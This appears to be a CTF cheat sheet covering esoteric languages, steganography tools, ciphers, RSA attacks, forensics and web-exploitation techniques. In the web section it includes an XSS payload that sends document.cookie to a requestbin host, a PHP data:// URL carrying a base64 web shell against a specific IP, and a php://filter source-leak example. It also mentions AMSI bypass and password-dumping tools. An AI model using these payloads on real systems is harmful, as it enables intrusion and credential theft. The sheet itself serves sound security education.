March 27, 2021 | Credits: John Hammond and [Aaron Lewis]
This is an introduction to some of the basics of each category. It was designed to help beginners and old comrades, enjoy the ride and "Pwn Every CTF".
-
An online tool that has a ton of Esoteric language interpreters.
-
Brainfuck
This language is easily detectable by its huge use of plus signs, braces, and arrows. There are plenty of online interpreters, like this one: https://copy.sh/brainfuck/ Some example code:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.-----------
--.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.-------------
--.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++
.<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++.
-
An esoteric language that looks a lot like Base85... but isn't. Often has references to "Inferno" or "Hell" or "Dante." Online interpreters like so: http://www.malbolge.doleczek.pl/ Example code:
(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc
-
A graphical programming language... looks like large 8-bit pixels in a variety of colors. Can be interpreted with the tool
npiet
-
A joke language. Recognizable by
.
and?
, and!
.
Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook! Ook! Ook? Ook! Ook? Ook.
Ook! Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook?
Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.
-
Don't ever forget about
steghide
! This tool can use a password list likerockyou.txt
with steghide. SOME IMAGES CAN HAVE MULTIPLE FILED ENCODED WITH MULTIPLE PASSWORDS. -
This is similar to
stegcracker
above. -
A Java
.JAR
tool, that can extract data from an image. A good tool to use on guessing challenges, when you don't have any other leads. We found this tool after the Misc50 challenge from HackIM 2018 -
A Java
.JAR
tool, that will open an image and let you as the user arrow through different renditions of the image (viewing color channels, inverted colors, and more). The tool is surprisingly useful. -
A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge.
-
Command-line tool for use against Least Significant Bit steganography... unfortunately only works against PNG and BMP images.
-
Another command-line tool to use against JPEG images. https://github.com/lukechampine/jsteg Handy for Hackerrank Codefest CTF 2018.
-
A GUI tool for JPG steganography. https://sourceforge.net/projects/jstego/ It is a Java JAR file similar to stegsolve.jar
-
Morse Code
Always test for this if you are seeing two distinct values... it may not always be binary! Online decoders like so: https://morsecode.scphillips.com/translator.html
-
Whitespace
Tabs and spaces could be representing 1's and 0's and treating them as a binary message... or, they could be whitespace done with
snow
or an esoteric programming language interpreter: https://tio.run/#whitespace -
DNA Codes
When given a sequence with only A, C, G, T , there is an online mapping for these. Try this:
-
A command-line tool for whitespace steganography (see above).
-
SONIC Visualizer (audio spectrum)
Some classic challenges use an audio file to hide a flag or other sensitive stuff. SONIC visualizer easily shows you spectrogram. If it sounds like there is random bleeps and bloops in the sound, try this tactic!
-
Audio frequencies common to a phone button, DTMF: https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling.
-
Phone-Keypad
Some messages may be hidden with a string of numbers, but really be encoded with old cell-phone keypads, like text messaging with numbers repeated:
-
A Python module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a QR code visible in a video, displayed through "Star Wars" style text motion.
-
A small square "barcode" image that holds data.
-
A command-line tool to quickly scan multiple forms of barcodes, QR codes included. Installed like so on a typical Ubuntu image:
sudo apt install zbar-tools
-
Punctuation marks
!
,.
and?
I have seen some challenges use just the end of
.
or?
or!
to represent the Ook esoteric programming language. Don't forget that is a thing!
-
Keyboard Shift
https://www.dcode.fr/keyboard-shift-cipher If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift...
-
Bit Shift
Sometimes the letters may be shifted by a stated hint, like a binary bit shift ( x >> 1 ) or ( x << 1 ).
-
Reversed Text
Sometimes a "ciphertext" is just as easy as reversed text. Don't forgot to check under this rock! You can reverse a string in Python like so:
"UOYMORFEDIHOTGNIYRTEBTHGIMFTCATAHTTERCESASISIHT"[::-1]
-
XOR
ANY text could be XOR'd. Techniques for this are Trey's code, and XORing the data against the known flag format. Typically it is given in just hex, but once it is decoded into raw binary data, it gives it keeps it's hex form (as in
\xde\xad\xbe\xef
etc..) Note that you can do easy XOR locally with Python like so (you needpwntools
installed):python >>> import pwn; pwn.xor("KEY", "RAW_BINARY_CIPHER")
-
Caesar Cipher
The most classic shift cipher. Tons of online tools like this: https://www.dcode.fr/caesar-cipher or use
caesar
as a command-line tool (sudo apt install bsdgames
) and you can supply a key for it. Here's a one liner to try all letter positions:cipher='jeoi{geiwev_gmtliv_ws_svmkmrep}' ; for i in {0..25}; do echo $cipher | caesar $i; done
Be aware! Some challenges include punctuation in their shift! If this is the case, try to a shift within all 255 ASCII characters, not just 26 alphabetical letters!
-
caesar
A command-line caesar cipher tool (noted above) found in the
bsdgames
package. -
If you have some text that you have no idea what it is, try the Atbash cipher! It's a letter mapping, but the alphabet is reversed: like
A
maps toZ
,B
maps toY
and so on. There are tons of online tools to do this (http://rumkin.com/tools/cipher/atbash.php), and you can build it with Python. -
http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx, https://www.guballa.de/vigenere-solver and personal Python code here: https://pastebin.com/2Vr29g6J
-
Beaufourt Cipher
-
Python random module cracker/predictor
https://github.com/tna0y/Python-random-module-cracker... helps attack the Mersenne Twister used in Python's random module.
-
Transposition Cipher
-
RSA: Classic RSA
Variables typically given:
n
,c
,e
. ALWAYS try and give to http://factordb.com. Ifp
andq
are able to be determined, use some RSA decryptor; handmade code available here: https://pastebin.com/ERAMhJ1v -
RSA: Multi-prime RSA
-
RSA:
e
is 3 (or small)If
e
is 3, you can try the cubed-root attack. If you the cubed root ofc
, and if that is smaller than the cubed root ofn
, then your plaintext messagem
is just the cubed root ofc
! Here is Python code to take the cubed root:
def root3rd(x):
y, y1 = None, 2
while y!=y1:
y = y1
y3 = y**3
d = (2*y3+x)
y1 = (y*(y3+2*x)+d//2)//d
return y
-
RSA: Weiner's Little D Attack
The telltale sign for this kind of challenge is an enormously large
e
value. Typicallye
is either 65537 (0x10001) or3
(like for a Chinese Remainder Theorem challenge). Some stolen code available here: https://pastebin.com/VKjYsDqD -
RSA: Chinese Remainder Attack
These challenges can be spotted when given mutiple
c
cipher texts and multiplen
moduli.e
must be the same number of givenc
andn
pairs. Some handmade code here: https://pastebin.com/qypwc6wH -
This is an adaptation of RC4... just not. There is an implementation available in Python. https://github.com/dstein64/LC4/blob/master/documentation.md
-
Elgamal
-
Affine Cipher
-
Substitution Cipher (use quip quip!)
-
Railfence Cipher
-
racker: http://bionsgadgets.appspot.com/ww_forms/playfair_ph_web_worker3.html
-
Polybius Square
-
The Engima
http://enigma.louisedade.co.uk/enigma.html, https://www.dcode.fr/enigma-machine-cipher
-
AES ECB
The "blind SQL" of cryptography... leak the flag out by testing for characters just one byte away from the block length.
-
Two-Time Pad
-
The go-to tool for examining
.pcap
files. -
Seriously cool tool that will try and scrape out images, files, credentials and other goods from PCAP and PCAPNG files.
-
Not all tools like the PCAPNG file format... so you can convert them with an online tool http://pcapng.com/ or from the command-line with the
editcap
command that comes with installing Wireshark:
editcap old_file.pcapng new_file.pcap
-
[
tcpflow
][tcpflow]A command-line tool for reorganizing packets in a PCAP file and getting files out of them. Typically it gives no output, but it creates the files in your current directory!
tcpflow -r my_file.pcap
ls -1t | head -5 # see the last 5 recently modified files
-
A GUI tool to visualize network traffic.
-
Magic Hashes
A common vulnerability in PHP that fakes hash "collisions..." where the
==
operator falls short in PHP type comparison, thinking everything that follows0e
is considered scientific notation (and therefore 0). More valuable info can be found here: https://github.com/spaze/hashes, but below are the most common breaks.
Plaintext | MD5 Hash |
---|---|
240610708 | 0e462097431906509019562988736854 |
QLTHNDT | 0e405967825401955372549139051580 |
QNKCDZO | 0e830400451993494058024219903391 |
PJNPDWY | 0e291529052894702774557631701704 |
NWWKITQ | 0e763082070976038347657360817689 |
NOOPCJF | 0e818888003657176127862245791911 |
MMHUWUV | 0e701732711630150438129209816536 |
MAUXXQC | 0e478478466848439040434801845361 |
IHKFRNS | 0e256160682445802696926137988570 |
GZECLQZ | 0e537612333747236407713628225676 |
GGHMVOE | 0e362766013028313274586933780773 |
GEGHBXL | 0e248776895502908863709684713578 |
EEIZDOI | 0e782601363539291779881938479162 |
DYAXWCA | 0e424759758842488633464374063001 |
DQWRASX | 0e742373665639232907775599582643 |
BRTKUJZ | 00e57640477961333848717747276704 |
ABJIHVY | 0e755264355178451322893275696586 |
aaaXXAYW | 0e540853622400160407992788832284 |
aabg7XSs | 0e087386482136013740957780965295 |
aabC9RqS | 0e041022518165728065344349536299 |
Plaintext | SHA1 Hash |
---|---|
aaroZmOk | 0e66507019969427134894567494305185566735 |
aaK1STfY | 0e76658526655756207688271159624026011393 |
aaO8zKZF | 0e89257456677279068558073954252716165668 |
aa3OFF9m | 0e36977786278517984959260394024281014729 |
-
preg_replace
A bug in older versions of PHP where the user could get remote code execution
-
php://filter
for Local File InclusionA bug in PHP where if GET HTTP variables in the URL are controlling the navigation of the web page, perhaps the source code is
include
-ing other files to be served to the user. This can be manipulated by using PHP filters to potentially retrieve source code. Example like so:
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
-
data://text/plain;base64
A PHP stream that can be taken advantage of if used and evaluated as an
include
resource or evaluated. Can be used for RCE: check out this writeup: https://ctftime.org/writeup/8868 ... TL;DR:
http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
-
pdfinfo
A command-line tool to get a basic synopsis of what the PDF file is.
-
pdfcrack
A comand-line tool to recover a password from a PDF file. Supports dictionary wordlists and bruteforce.
-
pdfimages
A command-line tool, the first thing to reach for when given a PDF file. It extracts the images stored in a PDF file, but it needs the name of an output directory (that it will create for) to place the found images.
-
A command-line tool to extract files out of a PDF.
-
The starting values that identify a file format. These are often crucial for programs to properly read a certain file type, so they must be correct. If some files are acting strangely, try verifying their magic number with a trusted list of file signatures.
-
An online tool that allows you to modify the hexadecimal and binary values of an uploaded file. This is a good tool for correcting files with a corrupt magic number
-
A Python script to examine a
.mozilla
configuration file, to examine downloads, bookmarks, history or bookmarks and registered passwords. Usage may be as such:
python dumpzilla.py .mozilla/firefox/c3a958fk.default/ --Downloads --History --Bookmarks --Passwords
-
Repair image online tool
Good low-hanging fruit to throw any image at: https://online.officerecovery.com/pixrecovery/
-
foremost
A command-line tool to carve files out of another file. Usage is
foremost [filename]
and it will create anoutput
directory.
sudo apt install foremost
-
binwalk
A command-line tool to carve files out of another file. Usage to extract is
binwalk -e [filename]
and it will create a_[filename]_extracted
directory.
sudo apt install binwalk
-
A command-line tool to carve out files of another file. Very similar to the other tools like
binwalk
andforemost
, but always try everything! -
A command-line tool, used to recover deleted files from a file system image. Handy to use if given a
.dd
and.img
file etc.
-
pngcheck
A command-line tool for "checking" a PNG image file. Especially good for verifying checksums.
-
A command-line tool to extract all the resources from an APK file. Usage:
apktool d <file.apk>
-
A command-line tool to convert a J.dex file to .class file and zip them as JAR files.
-
A GUI tool to decompile Java code, and JAR files.
-
robots.txt
This file tries to hide webpages from web crawlers, like Google or Bing or Yahoo. A lot of sites try and use this mask sensitive files or folders, so it should always be some where you check during a CTF. http://www.robotstxt.org/
-
A web browser plug-in that offers an easy interface to modifying cookies. THIS IS OFTEN OVERLOOKED, WITHOUT CHANGING THE VALUE OF THE COOKIES... BE SURE TO FUZZ EVERYTHING, INCLUDING COOKIE VALUES!
-
Backup pages (
~
and.bak
and.swp
)Some times you may be able to dig up an old version of a webpage (or some PHP source code!) by adding the usual backup suffixes. A good thing to check!
-
/admin/
This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check.
-
/.git/
A classic CTF challenge is to leave a
git
repository live and available on a website. You can see this withnmap -A
(or whatever specific script catches it) and just by trying to view that specific folder,/.git/
. A good command-line tool for this isGitDumper.sh
, or just simply usingwget
. -
A command-line tool that will automatically scrape and download a git repository hosted online with a given URL.
-
XSS Filter Evasion Cheat Sheet. Cross-site scripting, vulnerability where the user can control rendered HTML and ideally inject JavaScript code that could drive a browser to any other website or make any malicious network calls. Example test payload is as follows:
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Typically you use this to steal cookies or other information, and you can do this with an online requestbin.
<img src="#" onerror="document.location='http://requestbin.fullcontact.com/168r30u1?c' + document.cookie">
-
If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module.
#!/usr/bin/env python
import cfscrape
url = 'http://yashit.tech/tryharder/'
scraper = cfscrape.create_scraper()
print scraper.get(url).content
-
A command-line tool for automated XSS attacks. Seems to function like how sqlmap does.
-
- A Ruby script to scan and do reconnaissance on a Wordpress application.
-
Cookie Catcher
-
A free tool and online end-point that can be used to catch HTTP requests. Typically these are controlled and set by finding a XSS vulnerabilty.
-
A free tool and online end-point that can be used to catch HTTP requests. Typically these are controlled and set by finding a XSS vulnerabilty.
-
A command-line tool written in Python to automatically detect and exploit vulnerable SQL injection points.
-
Flask Template Injection
https://nvisium.com/resources/blog/2015/12/07/injecting-flask.html, https://nvisium.com/resources/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html, https://nvisium.com/resources/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii.html
-
SQL
IF
statementsThese are handy for some injections and setting up some Blind SQL if you need to. Syntax is like
SELECT ( IF ( 1=1, "Condition successful!", "Condition errored!" ) )
-
Explicit SQL Injection
-
Blind SQL Injection
-
gobuster
-
DirBuster
-
nikto
-
Burpsuite
-
ltrace
andstrace
Easy command-line tools to see some of the code being executed as you follow through a binary. Usage:
ltrace ./binary
-
Hopper
-
Binary Ninja
-
gdb
-
IDA
-
A PowerShell suite of tools for pentesting. Has support for an ICMP reverse shell!
-
HUGE PowerShell library and tool to do a lot of post-exploitation.
-
Bypass AMSI Anti-Malware Scan Interface
Great tool and guide for anti-virus evasion with PowerShell.
-
A Python module that examines the headers in a Windows PE (Portable Executable) file.
-
A Windows GUI tool to decompile and reverse engineer .NET binaries
-
A Windows tool to detect common packers, cryptors and compilers for Windows PE
-
jetBrains .NET decompiler
-
AutoIT converter
When debugging AutoIT programs, you may get a notification: "This is a compiled AutoIT script". Here is a good thing to use to decode them: https://www.autoitscript.com/site/autoit/downloads/
-
A small
.exe
GUI application that will "decompile" Python bytecode, often seen in.pyc
extension. The tool runs reliably on Linux with Wine.
-
Basic Stack Overflow
Use
readelf -s <binary>
to get the location of a function to jump to -- overflow in Python, find offset withdmesg
, and jump. -
printf
vulnerabilityA C binary vulnerability, where
printf
is used with user-supplied input without any arguments. Hand-made code to exploit and overwrite functions: https://pastebin.com/0r4WGn3D and a video walkthrough explaining: https://www.youtube.com/watch?v=t1LH9D5cuK4 -
A good Python module to streamline exploiting a format string vulnerability. THIS IS NOT ALWAYS A GOOD TACTIC...
-
64-bit Buffer Overflow
64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with
readelf -s
). But, check if whether or not the function address you need starts with the same hex values already on the stack (inrsp
). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address.
Base64:
TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
Base32
ORUGS4ZANFZSAYLOEBSXQYLNOBWGKIDPMYQGEYLTMUZTELRANF2CA2LTEB3GS43JMJWGKIDCPEQGY33UOMQG6ZRAMNQXA2LUMFWCA3DFOR2GK4TTEBQW4ZBANVXXEZJAMVYXKYLMOMQHG2LHNZZSAZTPOIQHAYLEMRUW4ZZMEBSXQ5DSME======
Base85:
<~9jqo^BlbD-BleB1DJ+*+F(f,q/0JhKF<GL>[email protected]$d7F!,L7@<6@)/0JDEF<G%<+EV:2F!,
O<DJ+*.@<*K0@<6L(Df-\0Ec5e;DffZ(EZee.Bl.9pF"AGXBPCsi+DGm>@3BB/F*&OCAfu2/AKY
i(DIb:@FD,*)+C]U=@3BN#EcYf8ATD3s@q?d$AftVqCh[NqF<G:8+EV:.+Cf>-FD5W8ARlolDIa
l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
>uD.RTpAKYo'+CT/5+Cei#DII?(E,9)oF*2M7/c~>
-
Unicode characters encoding. Includes a lot of seemingly random spaces and chinese characters!
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
-
Wordsearches
Some CTFs have me solve wordsearchs as part of a challenge (TJCTF 2018). This code is super helpful: https://github.com/robbiebarrat/word-search
-
Password-protected Zip Files:
fcrackzip
andzip2john.py
Use
-
15 Puzzle
A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/
-
Chrome Password Dump
A Windows command-line tool to dump passwords saved with Google Chrome. http://securityxploded.com/chrome-password-dump.php
-
img2txt
A command-line tool to convert an image into ASCII for the terminal. Can be installed like so:
sudo apt install -y caca-utils
-
Strange Symbols/Characters
Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searcht these. They may be Egyptian Characters:
A list of interesting things I can use one day or have already used in the past.
- android-tools
- blockchain-tools
- blogs
- car-tools
- cloud-tools
- cobalt-strike-addons
- code-audit
- ctf-tools
- database-tools
- docker-tools
- exploit-development.md
- exploit-latest
- forensics-tools
- fuzzing-tools
- hail-mary-attack
- hardening
- hardware-tools
- honeypot
- ios-tools
- iot-tools
- machine-learning
- macos-tools
- malware-analysis
- malware-development
- masscan
- nmap
- office-tools
- password-tool
- payloads
- pentest-tools
- powershell-tools
- pwn-tips
- re-tools
- router-tools
- sdr-tools
- shellcode-tools
- software-development
- threat-detection
- wireless-tools